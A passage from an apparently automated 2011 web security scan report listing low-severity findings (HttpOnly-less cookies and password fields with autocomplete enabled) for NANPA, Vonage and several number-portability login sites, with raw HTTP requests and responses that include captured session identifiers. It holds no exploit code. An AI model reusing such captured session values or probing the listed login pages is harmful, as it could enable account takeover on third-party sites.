Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:14 GMT
Server: Apache
Last-Modified: Wed, 15 Sep 2010 18:21:30 GMT
ETag: "a0015-4331-4905066017e80"
Accept-Ranges: bytes
Content-Length: 17201
Content-Type: application/javascript
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

// QuickMenu Pro, Copyright (c) 1998 - 2003, OpenCube Inc. - http://www.opencube.com
//
//
// QuickMenu Pro is Compatible With....
//
// IE4, IE5.x, IE6 (Win 95, 98, ME, 2000, NT, XP)
/
...[SNIP]...

13.88. http://www.nationalnanpa.com/content/styles/nanpa_css_b.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /content/styles/nanpa_css_b.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/styles/nanpa_css_b.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:03 GMT
Server: Apache
Last-Modified: Fri, 21 May 2010 18:35:11 GMT
ETag: "28792-2cfd-4871ef38215c0"
Accept-Ranges: bytes
Content-Length: 11517
Content-Type: text/css
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

/* NANPA Stylesheet */
/* NeuStar (www.neustar.biz) */

/* General Site Structure */
body {
   background:#CDCDC5 url(/content/img/mainbg.gif) repeat-x top left;
   margin:0;
   padding:0;
   text-align:cente
...[SNIP]...

13.89. http://www.nationalnanpa.com/content/styles/nanpa_css_nav.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /content/styles/nanpa_css_nav.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/styles/nanpa_css_nav.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:07 GMT
Server: Apache
Last-Modified: Tue, 18 May 2010 18:03:17 GMT
ETag: "a001c-6ba-486e227e6a340"
Accept-Ranges: bytes
Content-Length: 1722
Content-Type: text/css
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

/* NANPA Stylesheet - Navigation */
/* NeuStar (www.neustar.biz) */

div.menuBar,
div.menuBar a.menuButton,
div.menu,
div.menu a.menuItem {
font-family: "MS Sans Serif", Arial, sans-serif;
font-si
...[SNIP]...

13.90. http://www.nationalnanpa.com/content/styles/nanpa_css_p.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /content/styles/nanpa_css_p.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/styles/nanpa_css_p.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:04 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:30 GMT
ETag: "a001b-17d-471ab6d10b380"
Accept-Ranges: bytes
Content-Length: 381
Content-Type: text/css
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

body {    
   font-family: Times, Times New Roman, serif;
   font-size: 12pt;
   background-color: #fff;
   margin:5px;
}

#banner {
   height:33px;
   background-color:#006384;
}

#content {
   margin:5px;
}

a:link,
...[SNIP]...

13.91. http://www.nationalnanpa.com/nas/public/assigned_code_query_step1.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /nas/public/assigned_code_query_step1.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nas/public/assigned_code_query_step1.do?method=selectNpas HTTP/1.1
Host: www.nationalnanpa.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=82268809.1305158784.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=82268809.597827469.1305158784.1305158784.1305158784.1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 01:12:32 GMT
Server: Apache
Set-Cookie: nanpaid=n9JhNL0QhPD1Fl4s2fQT8NrBVk0FBlYLJJHWG8dys0vSvJ5DMwWS!1521367000; path=/; HttpOnly
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/
Content-Length: 18894


<html>
<head>
<LINK REL="stylesheet" href="/nas/public/css/neustar.css">
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META NAME="EXPIRES" CONTENT="0">
<META NAME="CONTRIBUTORS"
...[SNIP]...

13.92. http://www.nationalnanpa.com/nas/public/css/images/layout/list.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /nas/public/css/images/layout/list.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nas/public/css/images/layout/list.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 00:07:14 GMT
Server: Apache
Content-Length: 1214
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Draft//EN">
<HTML>
<HEAD>
<TITLE>Error 404--Not Found</TITLE>
<META NAME="GENERATOR" CONTENT="WebLogic Server">
</HEAD>
<BODY bgcolor="white">
<FONT FACE=He
...[SNIP]...

13.93. http://www.nationalnanpa.com/nas/public/css/neustar.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /nas/public/css/neustar.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nas/public/css/neustar.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:28 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 7458
Last-Modified: Tue, 11 May 2010 09:16:54 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/css
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

body {
   margin:0;
   padding:0;
}

small.errMesg {
   FONT-WEIGHT: bold;
   FONT-SIZE: 8pt;
   COLOR: red;
FONT-FAMILY: Arial, Helvetica, Geneva, Swiss, SunSans-Regular
}

.logo {
   position: absolute;
   to
...[SNIP]...

13.94. http://www.nationalnanpa.com/nas/public/images/nanpa_hp_logo.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /nas/public/images/nanpa_hp_logo.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nas/public/images/nanpa_hp_logo.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:13 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 514
Last-Modified: Wed, 28 Apr 2010 15:20:28 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

...[SNIP]...

13.95. http://www.nationalnanpa.com/nas/public/images/neustar_logo.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /nas/public/images/neustar_logo.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nas/public/images/neustar_logo.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:13 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 1679
Last-Modified: Wed, 28 Apr 2010 15:21:12 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

...[SNIP]...

13.96. http://www.nationalnanpa.com/nas/public/images/px_CCCCCC.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /nas/public/images/px_CCCCCC.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nas/public/images/px_CCCCCC.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:13 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 43
Last-Modified: Sun, 25 Jan 2004 16:15:44 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/


13.97. http://www.nationalnanpa.com/nas/public/js/utilities.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /nas/public/js/utilities.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nas/public/js/utilities.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:12 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 3252
Last-Modified: Fri, 19 Sep 2008 10:26:54 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

// Move the selected items from list box1 to box2
function moveWithRefresh(lstbox1,lstbox2,doRefresh)
{
var box1Count = lstbox1.options.length;
for(var i=0; i < box1Count; i++)
{
   if ( l
...[SNIP]...

13.98. http://www.vonage-forum.com/forum8.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vonage-forum.com
Path:   /forum8.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

phpbb2mysq_data
phpbb2mysq_sid

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forum8.html HTTP/1.1
Host: www.vonage-forum.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:45:47 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.3.4
X-Cache: cache vv2.1 - mysql
X-CacheDebug-1: Cache has been disabled!
Cache-Control: no-cache, pre-check=0, post-check=0
Expires: 0
Pragma: no-cache
X-CacheDebug-2: Callback happened
ETag: "d-876637965.92489"
Vary: Accept-Encoding
Set-Cookie: phpbb2mysq_data=a%3A0%3A%7B%7D; expires=Fri, 11-May-2012 00:45:47 GMT; path=/; domain=www.vonage-forum.com
Set-Cookie: phpbb2mysq_sid=29e8b9dde66ce8864ecccdb3ea46feae; path=/; domain=www.vonage-forum.com
Content-Type: text/html
Content-Length: 92489

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Vonage LNP . Local Number Portability Forum</title>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=IS
...[SNIP]...

13.99. http://www.vonage.com/lp/US/afflpdc/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vonage.com
Path:   /lp/US/afflpdc/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

refer_id
LP

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /lp/US/afflpdc/?refer_id=AFLGN090801001W1&promo_id=USVONRP2499NSC_WEB&deviceType=VDV21_FREE_UPSELL HTTP/1.1
Host: www.vonage.com
Proxy-Connection: keep-alive
Referer: http://www.vonage-forum.com/forum8.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 00:50:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Set-Cookie: refer_id=AFLGN090801001W1; expires=Fri, 27-May-2011 00:50:29 GMT; path=/; domain=.vonage.com
Location: http://www.vonage.com/lp/US/afflpdc/index.php
Set-Cookie: LP=1%7E%7E; expires=Wed, 10-Aug-2011 00:50:30 GMT; path=/; domain=.vonage.com
Content-Type: text/html
Content-Length: 18264

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

13.100. http://www.vonage.com/lp/US/afflpdc/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vonage.com
Path:   /lp/US/afflpdc/index.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

LP

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lp/US/afflpdc/index.php HTTP/1.1
Host: www.vonage.com
Proxy-Connection: keep-alive
Referer: http://www.vonage-forum.com/forum8.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: refer_id=AFLGN090801001W1; LP=1%7E%7E

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:50:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Set-Cookie: LP=1%7E%7E; expires=Wed, 10-Aug-2011 00:50:30 GMT; path=/; domain=.vonage.com
Content-Type: text/html
Content-Length: 17336

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

14. Password field with autocomplete enabled
There are 27 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


14.1. http://forum.link2voip.com/favicon.ico

Summary

Severity:   Low
Confidence:   Certain
Host:   http://forum.link2voip.com
Path:   /favicon.ico

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /favicon.ico HTTP/1.1
Host: forum.link2voip.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: phpbb3_82ha5_u=1; phpbb3_82ha5_k=; phpbb3_82ha5_sid=c8a27ebe829b8494c7b1d53ed606faba

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:45:01 GMT
Content-type: text/html; charset=UTF-8
Cache-Control: private, no-cache="set-cookie"
Expires: 0
Pragma: no-cache
Content-Length: 39662

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-gb" xml:lang="en
...[SNIP]...
<br />
   <form method="post" action="./ucp.php?mode=login">
   <table width="100%" border="0" cellpadding="0" cellspacing="0">
...[SNIP]...
</span> <input class="post" type="password" name="password" size="10" />&nbsp; <span class="gensmall">
...[SNIP]...

14.2. https://gvnwlnp.com/login.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   https://gvnwlnp.com
Path:   /login.aspx

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /login.aspx HTTP/1.1
Host: gvnwlnp.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=pf0wts55rdy2k0bdceo0lu45

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 00:50:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12113


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   LNP Login
...[SNIP]...
<body>
<form name="aspnetForm" method="post" action="login.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div>
...[SNIP]...
<td class="ContainerControlColumn">
<input name="ctl00$ContentPlaceHolder1$Login1$Password" type="password" id="ctl00_ContentPlaceHolder1_Login1_Password" />
<span id="ctl00_ContentPlaceHolder1_Login1_PasswordRequired" title="Password is required." style="color:Red;visibility:hidden;">
...[SNIP]...

14.3. https://lnp.activationnow.com/lnp/jsp/logon/login.jsp

Summary

Severity:   Low
Confidence:   Certain
Host:   https://lnp.activationnow.com
Path:   /lnp/jsp/logon/login.jsp

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /lnp/jsp/logon/login.jsp;jsessionid=qYpFNLnKf9fjDZKSkzRJcC5TnR1f7fVpwYdyvx2Q2sJRqJ1jTZD9!-1217543413 HTTP/1.1
Host: lnp.activationnow.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LNP=pabetaptel15p-lnp; JSESSIONID=qYpFNLnKf9fjDZKSkzRJcC5TnR1f7fVpwYdyvx2Q2sJRqJ1jTZD9!-1217543413

Response

HTTP/1.1 200 OK
Set-Cookie: LNP=pabetaptel15p-lnp; path=/; expires=Thu, 12-May-2011 02:41:17 GMT
Cache-Control: no-store
Date: Thu, 12 May 2011 00:50:20 GMT
Pragma: no-cache
Content-Length: 6277
Content-Type: text/html; charset=ISO-8859-1
Expires: Wed, 31 Dec 1969 23:59:59 GMT
X-Powered-By: Servlet/2.4 JSP/2.0


<html>
<!--
/*
* @(#)login.jsp 5/1/2001 11:55:44 AM
*
* Copyright 2001-2009 Synchronoss Technologies, Inc. 1525 Valley Center Parkway,
* Bethlehem, Pennsylvania, 18017, U.S.A. All Rights R
...[SNIP]...
<body>
<form action="j_security_check" method="post">
<!-- <form action="?action=login" method="post">
...[SNIP]...
<td class="logon-input" width="60%">
    <input type="password" name="j_password" size="20">
    </td>
...[SNIP]...

14.4. http://nanpa.org/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://nanpa.org
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: nanpa.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:03:38 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 24631

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<div class="memlogin">
<form id="login" method="post" action="https://www.nanpa.org/members.php">
<table cellpadding="3" cellspacing="0" border="0" class="login_form">
...[SNIP]...
<td><input name="text2" type="password" size="10" class="login_box"/></td>
...[SNIP]...

14.5. http://nanpa.org/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://nanpa.org
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: nanpa.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:03:38 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 24631

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<div class="memlogin">
<form id="login" method="post" action="https://www.nanpa.org/members.php">
<table cellpadding="3" cellspacing="0" border="0" class="login_form">
...[SNIP]...
<td><input name="text2" type="password" size="10" class="login_box"/></td>
...[SNIP]...

14.6. http://nanpa.org/about_overview.php

Summary

Severity:   Low
Confidence:   Certain
Host:   http://nanpa.org
Path:   /about_overview.php

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /about_overview.php HTTP/1.1
Host: nanpa.org
Proxy-Connection: keep-alive
Referer: http://nanpa.org/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsize=12

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:04:19 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 19653

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<div class="memlogin">
<form id="login" method="post" action="https://www.nanpa.org/members.php">
<table cellpadding="3" cellspacing="0" border="0" class="login_form">
...[SNIP]...
<td><input name="text2" type="password" size="10" class="login_box"/></td>
...[SNIP]...

14.7. http://nanpa.org/about_overview.php

Summary

Severity:   Low
Confidence:   Certain
